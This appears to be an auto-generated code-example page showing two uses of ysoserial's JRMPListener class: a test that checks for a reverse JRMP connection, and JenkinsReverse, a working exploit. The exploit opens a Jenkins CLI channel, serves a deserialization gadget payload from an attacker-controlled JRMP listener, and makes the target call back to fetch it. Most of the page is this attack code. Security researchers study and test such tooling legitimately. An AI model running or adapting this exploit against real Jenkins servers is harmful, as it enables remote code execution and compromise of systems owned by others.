Examples with JRMPListener - ysoserial.exploit.JRMPListener

Example 1 with JRMPListener

use of ysoserial.exploit.JRMPListener in project ysoserial by frohoff.

the class JRMPReverseConnectTest method run.

public void run(Callable<Object> payload) throws Exception {
    JRMPListener l = new JRMPListener(port, new BadAttributeValueExpException("foo"));
    Thread t = new Thread(l, "JRMP listener");
    try {
        t.start();
        try {
            payload.call();
        } catch (Exception e) {
        // ignore
        }
        Assert.assertTrue("Did not have connection", l.waitFor(1000));
    } finally {
        l.close();
        t.interrupt();
        t.join();
    }
}

Also used : JRMPListener(ysoserial.exploit.JRMPListener) BadAttributeValueExpException(javax.management.BadAttributeValueExpException) BadAttributeValueExpException(javax.management.BadAttributeValueExpException)

Example 2 with JRMPListener

use of ysoserial.exploit.JRMPListener in project ysoserial by frohoff.

the class JenkinsReverse method main.

public static final void main(final String[] args) {
    if (args.length < 4) {
        System.err.println(JenkinsListener.class.getName() + " <jenkins_url> <local_addr> <payload_type> <payload_arg>");
        System.exit(-1);
    }
    final Object payloadObject = Utils.makePayloadObject(args[2], args[3]);
    String myAddr = args[1];
    int jrmpPort = new Random().nextInt(65536 - 1024) + 1024;
    String jenkinsUrl = args[0];
    Thread t = null;
    Channel c = null;
    try {
        InetSocketAddress isa = JenkinsCLI.getCliPort(jenkinsUrl);
        c = JenkinsCLI.openChannel(isa);
        JRMPListener listener = new JRMPListener(jrmpPort, payloadObject);
        t = new Thread(listener, "ReverseDGC");
        t.setDaemon(true);
        t.start();
        Registry payload = new JRMPClient().getObject(myAddr + ":" + jrmpPort);
        c.call(JenkinsCLI.getPropertyCallable(payload));
        listener.waitFor(1000);
        listener.close();
    } catch (Throwable e) {
        e.printStackTrace();
    } finally {
        if (c != null) {
            try {
                c.close();
            } catch (IOException e) {
                e.printStackTrace(System.err);
            }
        }
        if (t != null) {
            t.interrupt();
            try {
                t.join();
            } catch (InterruptedException e) {
                e.printStackTrace(System.err);
            }
        }
    }
    Utils.releasePayload(args[2], payloadObject);
}

Also used : InetSocketAddress(java.net.InetSocketAddress) Channel(hudson.remoting.Channel) Registry(java.rmi.registry.Registry) IOException(java.io.IOException) Random(java.util.Random) JRMPListener(ysoserial.exploit.JRMPListener) JRMPClient(ysoserial.payloads.JRMPClient)

Aggregations

JRMPListener (ysoserial.exploit.JRMPListener)2 Channel (hudson.remoting.Channel)1 IOException (java.io.IOException)1 InetSocketAddress (java.net.InetSocketAddress)1 Registry (java.rmi.registry.Registry)1 Random (java.util.Random)1 BadAttributeValueExpException (javax.management.BadAttributeValueExpException)1 JRMPClient (ysoserial.payloads.JRMPClient)1